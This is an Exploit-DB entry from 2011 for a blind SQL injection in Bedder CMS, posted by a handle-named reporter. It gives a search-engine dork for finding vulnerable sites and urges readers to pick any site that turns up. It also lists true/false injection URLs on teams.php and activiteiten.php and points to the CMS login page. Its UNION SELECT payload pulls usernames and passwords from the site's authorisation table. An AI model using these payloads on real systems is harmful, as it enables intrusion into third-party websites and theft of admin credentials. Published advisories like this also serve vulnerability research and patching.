Bedder CMS - Blind SQL Injection Vulnerability

2011-04-16T00:00:00
ID EDB-ID:17179
Type exploitdb
Reporter ^Xecuti0N3r
Modified 2011-04-16T00:00:00

Description

Bedder CMS - Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            #(+)Exploit Title: Bedder CMS Blind SQL Injection Vulnerability
#(+)Author   : ^Xecuti0n3r
#(+) Date    : 15.04.2011
#(+) Hour    : 13:37 PM
#(+) E-mail  :  xecuti0n3r()yahoo.com
#(+) dork    : intext:"Design by Bedder"
#(+) Category  : Web Apps [Blind SQli]

____________________________________________________________________
____________________________________________________________________

Choose any site that comes up when you enter the dork intext:"Design by Bedder" in search engine


    *Blind SQL injection Vulnerability*
	


#	[+]True : http://site.com/teams.php?id=1 and 1=1--
#	[+]False: http://site.com/teams.php?id=1 and 1=2--
#	[+]eViL : http://site.com/teams.php?id=[SQLi]



#	[+]True : http://site.com/activiteiten.php?id=91 and 1=1--
#	[+]False: http://site.com/activiteiten.php?id=91 and 1=2--
#	[+]eViL : http://site.com/activiteiten.php?id=[SQLi]


#	[+]Cms Login Page is at : http://site.com/cms/index.php

#      [+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie



____________________________________________________________________
____________________________________________________________________

########################################################################
(+)Exploit Coded by: ^Xecuti0n3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
########################################################################